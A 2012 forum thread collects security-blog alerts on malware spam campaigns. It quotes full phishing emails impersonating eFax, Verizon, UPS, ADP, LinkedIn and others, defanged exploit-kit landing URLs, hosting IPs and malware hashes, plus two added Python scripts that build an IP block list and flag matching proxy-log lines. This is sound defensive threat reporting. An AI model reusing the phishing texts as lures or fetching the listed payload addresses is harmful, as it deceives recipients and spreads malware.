The malicious payload is at [donotclick]sonatanamore .ru:8080/forum/links/column.php hosted on:
70.38.31.71 (iWeb, Canada)
202.3.245.13 (MANA, Tahiti)
203.80.16.81 (Myren, Malaysia)
Plain list of IPs and domains on those IPs for copy-and-pasting.
70.38.31.71, 202.3.245.13, 203.80.16.81 ..."
(More listed at the blog.dynamoo URL above.)
:mad:
-
SPAM leads to malware - 'just keeps coming 2012.10.04
FYI...
Fake "Corporate eFax message" SPAM / 184.164.136.147
- http://blog.dynamoo.com/2012/10/corp...164136147.html
4 Oct 2012 - "These fake fax messages lead to malware on 184.164.136.147:
Date: Thu, 04 Oct 2012 19:00:16 +0200
From: "eFax.Alert" [E988D6C @vida .org.pt]
Subject: Corporate eFax message - 09 pages
Fax Message [Caller-ID: 341-498-5688]
You have received a 09 pages fax at Thu, 04 Oct 2012 19:00:16 +0200.
* The reference number for this fax is min1_20121004190016.8673161.
View this fax using your PDF reader.
Click here to view this message
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service!
Home | Contact | Login
© 2011 j2 Global Communications, Inc. All rights reserved.
eFax® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax® Customer Agreement.
... The malicious payload is at [donotclick]184.164.136.147/links/assure_numb_engineers.php which is an IP address belonging to Secured Servers LLC in the US and suballocated to:
autharea=184.164.128.0/19
xautharea=184.164.128.0/19
network:City:Manilla ...
It might be worth blocking 184.164.136.128/27 to be on the safe side."
- http://www.google.com/safebrowsing/d...?site=AS:20454
"... over the past 90 days, 244 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... the last time suspicious content was found was on 2012-10-04..."
- http://www.google.com/safebrowsing/d...?site=AS:32164
"... the last time suspicious content was found was on 2012-10-03... we found 1 site(s) on this network... that appeared to function as intermediaries for the infection of 14 other site(s)..."
___
Verizon Wireless SPAM / strangernaturallanguage .net
- http://blog.dynamoo.com/2012/10/veri...less-spam.html
4 Oct 2012 - "This fake Verizon wireless spam leads to malware on strangernaturallanguage .net:
From: AccountNotify whitheringj @spcollege .edu
Date: 4 October 2012 18:52
Subject: Recent Notification in My Verizon
SIGNIFICANT ACCOUNT NOTIFICATION FROM VERIZON WIRELESS.
Your informational letter is available.
Your account # ending: XXX8 XXXX4
Our Valued Client
For your accommodation, your confirmation message can be found in the Account Documentation desk of My Verizon.
Please check your acknowledgment letter for all the information relating to your new transaction.
View Approval Message
In addition, in My Verizon you will find links to info about your device & services that may be helpfull if you looking for answers.
Thank you for joining us .
My Verizon is also accessible 24 hours 7 days a week to assist you with:
Usage details
Updating your tariff
Add Account Users
Pay your invoice
And much, much more...
© 2012 Verizon Wireless
Verizon Wireless | One Verizon Way | Mail Code: 523WSE | Basking Ridge, MA 55584
We respect your privacy. Please review our privacy policy for more details
The malicious payload is at [donotclick]strangernaturallanguage .net/detects/notification-status_login.php hosted on 183.81.133.121 (Vodafone, Fiji)..."
:buried:
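Several of the Dynamoo posts above reason the same way about what to block: three bad hosts inside one small allocation are enough to block the whole allocation (the Singlehop 108.178.59.0/26, 25 Sep), a whole hosting range with a history gets blocked outright (CyberBunker 84.22.96.0/19, 1 Oct; Interserver 66.45.251.224/29 and 199.71.233.226, 3 Oct; Secured Servers 184.164.136.128/27, 4 Oct), and an IP "that has been used a LOT for this type of attack" is worth blocking on its own. The block below is an added example, not the bloggers' own tooling: it turns the IP sightings quoted in the posts above into a block list using those three rules, and checks candidate IPs against it. The sightings list is transcribed from the posts (date, IP, campaign theme); the /26 grouping threshold of three and the "seen in two campaigns" rule are this example's own parameters, chosen to mirror the posts' reasoning.

```python
"""Build a block list from the IP sightings quoted in these posts, the way
the posts reason: several bad hosts in one small allocation -> block the
allocation; a host reused across campaigns -> block it outright; plus the
ranges the posts recommend as-is. Added example, not the bloggers' tooling."""
from collections import defaultdict
from ipaddress import collapse_addresses, ip_address, ip_network

# (date, IP, campaign theme), transcribed from the posts above.
SIGHTINGS = [
    ("2012-09-19", "203.91.113.6",    "FDIC"),
    ("2012-09-19", "72.167.253.106",  "FDIC C2"),
    ("2012-09-22", "69.194.201.21",   "LinkedIn"),
    ("2012-09-24", "108.178.59.11",   "BBB"),
    ("2012-09-25", "108.178.59.20",   "BBB"),
    ("2012-09-25", "108.178.59.26",   "BBB"),
    ("2012-09-25", "199.195.116.185", "BBB"),
    ("2012-09-26", "74.207.232.13",   "IRS"),
    ("2012-09-26", "203.91.113.6",    "IRS"),
    ("2012-10-01", "195.198.124.60",  "Intuit shipment"),
    ("2012-10-01", "69.194.194.221",  "Evolution1"),
    ("2012-10-01", "84.22.100.108",   "NACHA"),
    ("2012-10-01", "190.10.14.196",   "NACHA"),
    ("2012-10-01", "203.80.16.81",    "NACHA"),
    ("2012-10-02", "70.38.31.71",     "Friendster"),
    ("2012-10-02", "202.3.245.13",    "Friendster"),
    ("2012-10-02", "203.80.16.81",    "Friendster"),
    ("2012-10-03", "199.71.233.226",  "malvertising"),
    ("2012-10-04", "184.164.136.147", "eFax"),
    ("2012-10-04", "183.81.133.121",  "Verizon"),
]

# Ranges the posts recommend blocking, taken as-is.
RECOMMENDED = [ip_network(n) for n in (
    "108.178.59.0/26",     # Singlehop, 25 Sep
    "84.22.96.0/19",       # CyberBunker, 1 Oct
    "66.45.251.224/29",    # Interserver, 3 Oct
    "199.71.233.226/32",   # Netrouting, 3 Oct
    "184.164.136.128/27",  # Secured Servers, 4 Oct
)]


def group_by_prefix(ips, prefixlen):
    """Map each /prefixlen network to the observed addresses inside it."""
    groups = defaultdict(set)
    for ip in ips:
        groups[ip_network(f"{ip}/{prefixlen}", strict=False)].add(ip_address(ip))
    return groups


def propose_ranges(ips, prefixlen=26, min_hits=3):
    """Allocations with at least min_hits bad hosts (the 25 Sep post's /26 argument)."""
    return sorted(net for net, members in group_by_prefix(ips, prefixlen).items()
                  if len(members) >= min_hits)


def repeat_offenders(sightings, min_campaigns=2):
    """Hosts seen serving more than one campaign theme."""
    themes = defaultdict(set)
    for _, ip, theme in sightings:
        themes[ip].add(theme)
    return sorted(ip for ip, t in themes.items() if len(t) >= min_campaigns)


def build_blocklist(sightings, recommended):
    """Recommended ranges + proposed /26s + repeat offenders, with covered entries collapsed."""
    ips = {ip for _, ip, _ in sightings}
    nets = set(recommended)
    nets.update(propose_ranges(ips))
    nets.update(ip_network(f"{ip}/32") for ip in repeat_offenders(sightings))
    return list(collapse_addresses(nets))


def blocked_by(ip, blocklist):
    """The block-list entry covering ip, or None."""
    addr = ip_address(ip)
    return next((net for net in blocklist if addr in net), None)


def render_ipset(name, blocklist):
    """ipset commands that load the list into a hash:net set."""
    return [f"ipset create {name} hash:net"] + [f"ipset add {name} {net}" for net in blocklist]


if __name__ == "__main__":
    bl = build_blocklist(SIGHTINGS, RECOMMENDED)
    print("\n".join(render_ipset("malspam", bl)))
    for probe in ("108.178.59.26", "84.22.100.108", "203.91.113.6", "8.8.8.8"):
        print(probe, "->", blocked_by(probe, bl))
```

Feeding the resulting set to iptables (`-m set --match-set malspam dst -j DROP`) is the usual deployment; the collapse step matters because the repeat-offender /32s and the proposed /26 overlap with the recommended ranges and a hash:net set rejects nothing, so without it the list silently carries duplicates.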
-
Fake inTuit / UPS SPAM leads to malware...
FYI...
Intuit "GoPayment" SPAM / simplerkwiks .net
- http://blog.dynamoo.com/2012/10/intu...rkwiksnet.html
5 Oct 2012 - "This fake "Intuit GoPayment" spam leads to malware on simplerkwiks .net:
Date: Fri, 5 Oct 2012 15:54:26 +0100
From: "Intuit GoPayment" [abstractestknos65@pacunion.com]
Subject: Welcome - you're been granted access for Intuit GoPayment Merchant
Greetings & Congrats!
Your GoPayment? statement for WALLET , DEVELOPMENTS has been issued.
Intuit Payment
Account No.: XXXXXXXXXXXXXX16
Email Address: [redacted]
NOTE : Additional charges for this service may now apply.
Next step: Confirm your User ID
This is Very Important lets you:
Manage your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is you have active an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify UserID
Get started:
Step 1: If you have not still, download the Intuit application.
Step 2: Run the GoPayment app and sign in with the UserID (your email address) and Password you setup.
Easy Manage Your GoPayment System
The Intuit GoPayment Merchant Service Center is the website where you can learn a lot about GoPayment features, customize your sales receipt and add GoPayment users. You can also manage transactions, deposits and fees. Visit link and signin with your GoPayment Access ID (your email address) and Password.
For more information on how to get started using Intuit Merchant, including tutorials, FAQs and other resources, visit the Service Center at web site.
Please do not reply to this message. automative notification system not configured to accept incoming email.
System Terms & Agreements © 2012 Intuit, Inc. All rights reserved.
The malicious payload is at [donotclick]simplerkwiks .net/detects/congrats_verify-access.php hosted on 183.81.133.121 (Vodafone, Fiji) along with these other suspect domains:
addsmozy .net
officerscouldexecute .org
simplerkwiks .net
strangernaturallanguage .net
buzziskin .net
art-london .net "
___
UPS SPAM / minus.preciseenginewarehouse .com
- http://blog.dynamoo.com/2012/10/ups-...ehousecom.html
5 Oct 2012 - "This fake UPS spam leads to malware on minus.preciseenginewarehouse .com:
From: "UPSBillingCenter" [512A03797@songburi.com]
Subject: Your UPS Invoice is Ready
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center
Please visit the UPS Billing Center to view and pay your invoice.
Discover more about UPS:
Visit ups .com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The malicious payload is at [donotclick]minus.preciseenginewarehouse .com/links/assure_numb_engineers.php hosted on 174.140.165.112 ... To be precise, the subdomains seem malicious, the domains themselves appear to be legitimate ones where the domain account has been hacked. Blocking 174.140.165.112 would be prudent."
:mad: :mad:
-
Injection attacks from 5.9.188.54 ...
FYI...
Something evil on 5.9.188.54
- http://blog.dynamoo.com/2012/10/some...n-5918854.html
7 Oct 2012 - "Here's a nasty bunch of sites being used in injection attacks, all hosted on 5.9.188.54:
5.9.188.54 is a Hetzner IP address (no surprise there) suballocated to:
inetnum: 5.9.188.32 - 5.9.188.63
netname: LLC-CYBERTECH
descr: LLC "CyberTech"
country: DE ...
address: 125252 Moscow
address: RUSSIAN FEDERATION
... You might want to block the whole 5.9.188.32/27 range.. you should certainly block 5.9.188.54 if you can."
- http://centralops.net/co/DomainDossier.aspx
5.9.188.54
address: 125252 Moscow
address: RUSSIAN FEDERATION...
origin: AS24940
- http://google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 5865 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... last time suspicious content was found was on 2012-10-07... we found 998 site(s)... that appeared to function as intermediaries for the infection of 12809 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1752 site(s)... that infected 18780 other site(s)."
:mad:
-
Skype users targeted with Ransomware and Click Fraud
FYI...
Skype users targeted with Ransomware and Click Fraud
- http://www.gfi.com/blog/skype-users-...d-click-fraud/
Oct 8, 2012 - "The infection* that’s still spreading across users of Skype has taken an interesting twist: ransomware and click fraud. Skype users tempted to follow the latest set of infection links will end up with a zipfile on their PC. Here’s an example of the rogue links still being pinged around:
> http://www.gfi.com/blog/wp-content/u...ypevirus41.jpg
Clicking the link will download a zipfile, and running the executable inside will see the infected PC making waves with network traffic that wasn’t present when we tested the last executable...
> http://www.gfi.com/blog/wp-content/u...e4-300x152.jpg
After a while, a Java exploit will call down some fire from the sky (in the form of BlackHole 2.0) and the end-user will be horrified to see this:
> http://www.gfi.com/blog/wp-content/u...tionScare1.jpg
... a typical Ransomware scare message that locks the user out of their data, encrypts the files and demands payment (via Moneypak) to the tune of $200. The IP address and geographical location is displayed in the bottom right hand corner, along with various threats related to the downloading of MP3s, illegal pornography, gambling and more besides. Ransomware is currently a big deal and not something an end-user really wants to have on their computer. Meanwhile, behind the scenes we have what looks like attempts at click fraud taking place behind the locked computer screen... in the space of 10 minutes, we recorded 2,259 transmissions(!)... to infect the computer, you’ll need to manually click the download link, open the zip and run the executable. On top of that, anybody trying to open the file who hasn’t switched off file security warnings will be told that “The publisher could not be verified, are you sure you want to run this software” so there’s plenty of chances to dodge this bullet..."
* http://www.gfi.com/blog/infection-sp...o-skype-users/
:mad:
-
Skype SPAM voicemail leads to Blackhole / Zeus attacks
FYI...
Skype SPAM voicemail leads to Blackhole / Zeus attacks
- http://www.gfi.com/blog/skype-voicem...-zeus-attacks/
Oct 10, 2012 - "... spam mail... claims to be a Skype Voicemail notification, for example:
> http://www.gfi.com/blog/wp-content/u...cemailscam.png
It reads as follows:
Hi there,
You have a new voicemail
Sign in to Skype to listen to the message.
If you no longer want to receive email alerts about new voicemails, unsubscribe now.
Talk soon,
The people at Skype
It looks pretty authentic, and will send curious clickers to URLs tied up in Blackhole / Zeus infections. On a related note, we’re also seeing Sprint Wireless and fake Facebook friend request spam doing much the same as the above so please be careful when wading through your inbox – there’s a fair amount of spam targeting users with exploits right now and it covers a wide range of subjects from payroll notifications and Craigslist adverts to UPS invoices and American Express payment receipts."
- http://pandalabs.pandasecurity.com/i...and-messenger/
10/10/12
___
Skype Messages Spreading DORKBOT Variants
- http://blog.trendmicro.com/trendlabs...kbot-variants/
Oct 9, 2012
- http://blog.trendmicro.com/trendlabs...dorkbot-rises/
Oct 16, 2012 - "... spreading via Skype spammed messages... now reached (more than) 17,500 reported infections globally... DORKBOT is not primarily meant to steal information, but still has the capability to steal login credentials. It does this by hooking several APIs in popular web browsers. Among the sites monitored are Twitter, Facebook, Bebo, Friendster, Paypal, Netflix, and Sendspace. DORKBOT also checks strings sent to monitored sites via HTTP POST, thus information in HTTP form fields like passwords, usernames, and email addresses... DORKBOT downloads an updated copy of itself per day, which are typically undetected because they arrive with different packers. This is probably done to remain undetected on the infected system. With multiple dangerous routines and propagation methods well-fit into the common users’ typical online activities, DORKBOT is clearly a threat that users need to avoid and protect themselves from..."
- http://blog.spiderlabs.com/2012/10/w...-messages.html
12 Oct 2012
___
Rampaging Squirrel + Boyband = Twitter SPAM
- http://www.gfi.com/blog/rampaging-sq...-twitter-spam/
Oct 10, 2012 - "Yesterday I saw a news article that did a frankly amazing job of rendering the plight of a boyband member being attacked by a squirrel*, and mentioned it on Twitter. Within seconds, I was on the receiving end of some spam telling me I’d won a prize:
> http://www.gfi.com/blog/wp-content/u...0/1dirspam.jpg
Twitter users were spammed in groups, with the above account holding off on providing a URL to click. Instead, curious Tweeters would instead choose to visit the above account then click the URL in the profile – onedgiveaway(dot)com.
> http://www.gfi.com/blog/wp-content/u...0/2dirspam.jpg
“Congratulations 1D Fan! Please vote for your favourite 1D member below. To say thanks accept a free gift worth over $500
... I went for Liam Payne on the basis that he might be related to Max and ended up with the following survey page located at 1dviptickets(dot)com:
> http://www.gfi.com/blog/wp-content/u...0/3dirspam.jpg
... I came away with no free gift but lots of surveys (and a whole bunch of “Are you sure you want to go” style pop-ups while trying to leave the page) – nobody has “won” anything, it’s just some random fire-and-forget spam. At time of writing, the spam account is still active and blindfiring more messages to random Twitter users..."
* http://www.wandsworthguardian.co.uk/...Park_squirrel/
___
Fake job offers - union-trans .com employment scam
- http://blog.dynamoo.com/2012/10/unio...ment-scam.html
10 Oct 2012 - "This fake job offer is for a "forwarding agent"... basically it's a parcel reshipping scam where goods bought with stolen credit cards are sent to the "agent's" home address, and then the "agent" forwards the stolen goods on to Eastern Europe or China or whatever. Of course, when the police catch on it's the "agent" who is in deep, deep trouble... There appear to be several scam domains in this same email. union-trans .com is hosted on 180.178.32.238 (Simcentric, Hong Kong)... Originating IP is 183.134.113.165 (Zhejiang Telecom, Ningbo, China)... Generally speaking, unsolicited job offers from out-of-the-way places are bad news and should be avoided."
Sprint SPAM / 1.starkresidential .net
- http://blog.dynamoo.com/2012/10/spri...entialnet.html
9 Oct 2012 - "This fake Sprint spam leads to malware on 1.starkresidential .net...
The malicious payload is at [donotclick]1.starkresidential .net/links/assure_numb_engineers.php hosted on 74.207.233.58 (Linode, US)... appear to be malicious subdomains of legitimate hacked domains. If you can, you should block traffic to 74.207.233.58 to stop other malicious sites on the same server from being a problem."
"Biweekly payroll" SPAM / editdvsyourself .net
- http://blog.dynamoo.com/2012/10/biwe...urselfnet.html
9 Oct 2012 - "This fake payroll spam leads to malware on editdvsyourself .net...
The malicious payload is on [donotclick]editdvsyourself .net/detects/beeweek_status-check.php, hosted on the familiar IP address of 183.81.133.121 (Vodafone, Fiji)..."
___
Facebook Scam SPAM
- https://isc.sans.edu/diary.html?storyid=14281
Last Updated: 2012-10-10 14:32:26 UTC - "... reports of Facebook Scam Spam... TinyURL has since taken down the redirect and classified it as Spam. However, the image (and others like it) still propagate by FB users clicking on the link. This type of scam is used mostly -without- the permission of the vendor noted, in this case Costco*. The idea is to entice the user to click so they get -redirected- to a site where the business model depends on traffic volume...
> https://isc.sans.edu/diaryimages/Dia...-Scam-Spam.png
If you are a Facebook user, then please be wary of any offers that entice you to "click" to receive. It's a really bad practice. The holiday shopping season is beginning and these vectors are going to be heavily used by the scammers in the coming months."
:fear: :fear: :mad:
-
Malicious Presidential SPAM campaign has started...
FYI...
Malicious Presidential SPAM campaign has started...
- http://community.websense.com/blogs/...n-started.aspx
10 Oct 2012 - "... Websense... has detected a spam campaign that tries to exploit recipients' interest in the current presidential campaign in the US. Specifically, we have detected thousands of emails with this kind of content:
> http://community.websense.com/cfs-fi...2D00_550x0.png
... we are seeing an increasing number of spam campaigns with malicious links that lead to BlackHole exploit pages. This is also what happens with this campaign. If the recipient clicks on one of the links in the email, it starts a redirection flow which leads to URLs that host BlackHole exploit code. We simulated the recipient's experience with the support of the Fiddler tool, as shown below:
> http://community.websense.com/cfs-fi...0.sshot002.png
The pattern used strongly resembles the pattern used in other malicious, BlackHole-based spam campaigns, so we decided to investigate using a little set of samples from this campaign. The samples were chosen based on thousands of emails.
> http://community.websense.com/cfs-fi...6.sshot004.PNG
The links found in the spam emails usually have this kind of content:
> http://community.websense.com/cfs-fi...8.sshot005.PNG
The purpose of this flow as usual is to install malicious files. In this malicious SPAM campaign, we noticed low-detection PDF, JAR and EXE files (used to compromise the victim systems). During our simulated user experience we have found the following involved files:
PDF - MD5: 69e51d3794250e3f1478404a72c7a309
JAR file - MD5: 03373056bb050c65c41196d3f2d68077
about.exe - MD5: 9223b428b28c7b8033edbb588968eaea ...
Each URL... contains a redirection payload that leads the victim to a malicious website that hosts BlackHole exploit kit 2.0 obfuscated code..."
- http://blog.trendmicro.com/trendlabs...nline-threats/
Update as of Oct 11, 2012 - "... email is supposedly from CNN and contains news stories about the election:
> http://blog.trendmicro.com/trendlabs...0/cnn-spam.png
... instead of news articles, the links lead users to a variant of the ZeuS banking Trojan, delivered by the Blackhole exploit kit..."
- http://blog.trendmicro.com/trendlabs...nline-threats/
Oct 10, 2012 - "... This reinforces the fact that the bad guys have all the bases covered when it comes to exploiting popular events. Whoever wins come November 6th, end users will end up losing in one way or another if they’re not careful. So keep yourself informed. Get your news only from trusted sources, and make sure to have an Internet security solution installed on your devices."
:mad:
-
LinkedIn SPAM and more SPAM...
FYI... Multiple entries:
LinkedIn SPAM / inklingads .biz
- http://blog.dynamoo.com/2012/10/link...ingadsbiz.html
11 Oct 2012 - "The bad guys are very busy today with all sorts of spam campaigns, including lots of messages as below pointing to malware on
From: LinkedIn Notification [mailto:hewedngq6@omahahen.org]
Sent: 11 October 2012 15:59
Subject: LinkedIn Reminder
Importance: High
LinkedIn
REMINDERS
Invite events:
From Thaddeus Sosa ( Your servant)
PENDING EVENTS
There are a total of 3 messages awaiting your action. See your InBox immediately...
The malicious payload is on [donotclick]inklingads.biz/detects/invite-request_checking.php hosted on 183.81.133.121 (Vodafone, Fiji)"
___
ADP SPAM / 198.143.159.108
- http://blog.dynamoo.com/2012/10/adp-...143159108.html
12 Oct 2012 - "Yet -more- fake ADP spam (there has been a lot over the past 24 hours) is being pushed out. This time there's a malicious payload at [donotclick]198.143.159.108 /links/rules_familiar-occurred.php (Singlehop, US).
Avoid."
___
ADP SPAM / 4.wapin .in and 173.224.209.165:
- http://blog.dynamoo.com/2012/10/adp-spam-4wapinin.html
11 Oct 2012 - "This fake ADP spam leads to malware on 4.wapin .in:
From: ADP.Security [mailto:5BC4F06B@act4kids.net]
Sent: 11 October 2012 14:22
Subject: ADP: Urgent Notification
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
----
Digital Certificate About to Expire...
The malicious payload is on [donotclick]4.wapin .in/links/assure_numb_engineers.php hosted on 198.136.53.39 (Comforthost, US).
Another variant of this goes to [donotclick]173.224.209.165/links/assure_numb_engineers.php (Psychz Networks, US)"
___
ADP SPAM / 108.61.57.66
- http://blog.dynamoo.com/2012/10/adp-spam-108615766.html
11 Oct 2012 - "There's masses of ADP-themed spam today. Here is another one:
Date: Thu, 11 Oct 2012 14:53:17 -0200
From: "ADP.Message" [986E3877@dixys.com]
Subject: ADP Generated Message
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
---------------------------------------------------------------------
Digital Certificate About to Expire
---------------------------------------------------------------------
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 3
Expiration date: Oct 14 23:59:59 GMT-03:59 2012
---------------------------------------------------------------------
Renewing Your Digital Certificate ...
In this case the malicious payload is at [donotclick]108.61.57.66 /links/assure_numb_ engineers .php hosted by Choopa LLC in the US. The IP is probably worth blocking to be on the safe side."
___
Blackhole sites to block ...
- http://blog.dynamoo.com/2012/10/blac...ck-111012.html
11 Oct 2012 - "A bunch of sites are active today with the Blackhole exploit kit.. here are the ones seen so far:
183.81.133.121
198.136.53.39
173.255.223.77
64.247.188.141
inklingads .biz
The delivery mechanisms are fake LinkedIn and eFax messages. Block those IPs if you can."
___
"Copies of Policies" SPAM / windowsmobilever .ru
- http://blog.dynamoo.com/2012/10/copi...cies-spam.html
11 Oct 2012 - "This slightly odd spam leads to malware on windowsmobilever .ru:
Date: Thu, 11 Oct 2012 10:55:37 -0500
From: "Amazon.com" [account-update@amazon.com]
Subject: RE: DONNIE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
DONNIE LOCKWOOD,
==========
Date: Thu, 11 Oct 2012 12:26:25 -0300
From: accounting@[redacted]
Subject: RE: MARGURITE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
MARGURITE Moss
Anyone who clicks on the link will end up on an exploit kit at [donotclick]windowsmobilever .ru:8080/forum/links/column.php - hosted on:
68.67.42.41 (Fibrenoire , Canada)
203.80.16.81 (MYREN, Malaysia)
These two IPs are currently involved in several malicious spam runs and should be blocked if you can."
___
eFax SPAM / 173.255.223.77 and chase .swf
- http://blog.dynamoo.com/2012/10/efax...-chaseswf.html
11 Oct 2012 - "Two different eFax spam runs seem to be going on at the same time:
' From: eFax Corporate [mailto:05EBD8C@poshportraits.com]
Sent: 11 October 2012 12:58
Subject: eFax notification
You have received a 50 page(-s) fax...'
' From: eFax.Corporate [mailto:2C4C2348@aieservices.com.au]
Sent: 11 October 2012 12:51
Subject: eFax: You have received new fax
You have received a 34 page(-s) fax...'
One leads to a malicious landing page at [donotclick]173.255.223.77 /links/assure_numb_engineers.php hosted by Linode in the US.
The other one is a bit odder, referring to a file called chase.swf on a hacked site. VT analysis shows just 1/44* which is -not- good..."
* https://www.virustotal.com/file/5db6...7784/analysis/
File name: chase.swf-QrUTmm
Detection ratio: 1/40
Analysis date: 2012-10-11 13:04:39 UTC...
:mad::mad:
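The posts above keep naming the same hosting IPs and the same landing-page paths (/links/assure_numb_engineers.php, /detects/...php, :8080/forum/links/column.php), and note that the apex domains are often legitimate hacked domains with only a subdomain pointed at the kit. As an added example (not code from the quoted dynamoo/GFI/Webroot posts), this script scans constructed proxy log lines for those indicators, matching on destination IP and URL path rather than on apex domain; the log line format is an assumption.

```python
"""Flag proxy log lines that hit the Blackhole landing-page indicators quoted
in this thread. Added example; indicator values come from the quoted posts,
the log lines and their format are constructed for the demonstration."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Hosting IPs the quoted posts name as serving Blackhole landing pages.
BAD_IPS = {
    "183.81.133.121",   # Vodafone, Fiji - recurs across many spam runs
    "198.136.53.39", "198.136.53.38",   # Comforthost, US
    "173.255.223.77", "74.207.233.58",  # Linode, US
    "64.247.188.141", "174.140.165.112", "74.91.112.86",
    "108.61.57.66", "198.143.159.108", "173.224.209.165",
    "68.67.42.41",      # Fibrenoire, Canada
    "203.80.16.81",     # MYREN, Malaysia
    "79.98.27.9",       # UAB Interneto Vizija, Lithuania
}

# Landing-page path shapes quoted repeatedly in the posts. The host is not
# matched on purpose: the posts say the apex domains are usually legitimate
# hacked domains, so path plus destination IP is the more reliable signal.
PATH_PATTERNS = [
    re.compile(r"^/links/assure_numb_engineers\.php$"),
    re.compile(r"^/links/[a-z]+_[a-z]+-[a-z]+\.php$"),   # rules_familiar-occurred.php
    re.compile(r"^/detects/[a-z]+[-_][a-z_-]+\.php$"),   # notification-status_login.php
    re.compile(r"^/forum/links/column\.php$"),           # the :8080 .ru hosts
]

# Assumed (constructed) log format: "<ts> <client> <METHOD> <url> <dest_ip> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<dest_ip>\S+) (?P<status>\d{3})$"
)


@dataclass
class Hit:
    client: str
    url: str
    reason: str


def check_line(line: str) -> Optional[Hit]:
    """Return a Hit if the line touches a listed IP or landing-page path."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # unparseable line: skip rather than guess
    url = m.group("url")
    parts = urlsplit(url)
    dest_ip = m.group("dest_ip")
    reasons = []
    if dest_ip in BAD_IPS:
        reasons.append(f"destination {dest_ip} is a listed Blackhole host")
    if parts.hostname in BAD_IPS:
        reasons.append("URL host is a listed Blackhole IP")
    if any(p.match(parts.path) for p in PATH_PATTERNS):
        reasons.append(f"path {parts.path} matches a landing-page pattern")
    if not reasons:
        return None
    return Hit(client=m.group("client"), url=url, reason="; ".join(reasons))


def scan(lines: Iterable[str]) -> List[Hit]:
    return [h for h in (check_line(line) for line in lines) if h is not None]


# Constructed sample log: three hits, one benign request, one malformed line.
SAMPLE_LOG = [
    "2012-10-11T15:02:11Z 10.0.0.21 GET http://inklingads.biz/detects/invite-request_checking.php 183.81.133.121 200",
    "2012-10-11T15:03:40Z 10.0.0.33 GET http://minus.preciseenginewarehouse.com/links/assure_numb_engineers.php 174.140.165.112 200",
    "2012-10-11T15:05:02Z 10.0.0.33 GET http://windowsmobilever.ru:8080/forum/links/column.php 68.67.42.41 200",
    "2012-10-11T15:06:00Z 10.0.0.21 GET http://www.preciseenginewarehouse.com/index.html 203.0.113.10 200",
    "garbage",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.client} -> {hit.url}: {hit.reason}")
```

The benign request to the hacked domain's apex produces no hit, which is the point of matching on path and IP instead of domain.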
-
Vodafone SPAM - emails serve malware
FYI...
Vodafone SPAM - emails serve malware
- http://blog.webroot.com/2012/10/15/v...serve-malware/
Oct 15, 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Vodafone Europe, in an attempt to trick their customers into executing the malicious file attachment found in the email...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate: Vodafone_Account_Balance.pdf.exe – MD5: 8601ece8b0c79ec3d4396f07319bbff1 * ... Trojan-Ransom.Win32.PornoAsset.xen; Worm:Win32/Gamarue.F..."
* https://www.virustotal.com/file/2d62...is/1349008562/
File name: Your_Friend_New_photos-updates.jpeg.exe
Detection ratio: 36/43
Analysis date: 2012-09-30 15:01:54 UTC
___
Fake UPS emails - client-side exploits and malware
- http://blog.webroot.com/2012/10/15/c...s-and-malware/
Oct 15, 2012 - "... cybercriminals spamvertised millions of email addresses, impersonating UPS, in an attempt to trick end users into viewing the malicious .html attachment. Upon viewing, the file loads a tiny iFrame attempting to serve client-side exploit served by the latest version of the BlackHole Exploit kit, which ultimately drops malware on the affected host.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Sample detection rate for a malicious .html file found in the spamvertised emails: UPS_N21489880.htm – MD5: 38a2a54d6e7391d7cd00b50ed76b9cfb * ... Trojan.Iframe.BCK; Trojan-Downloader.JS.Iframe.dbh
* https://www.virustotal.com/file/37d8...a453/analysis/
File name: java.jar
Detection ratio: 26/43
Analysis date: 2012-10-15
... currently responding to the following IPs – 84.22.100.108; 190.10.14.196; 203.80.16.81; 61.17.76.12; 213.135.42.98
... Related malicious domains part of the campaign’s infrastructure:
... Name servers part of the campaign’s infrastructure:
..."
___
Rogue Bad Piggies ...
- http://blog.trendmicro.com/trendlabs...gies-versions/
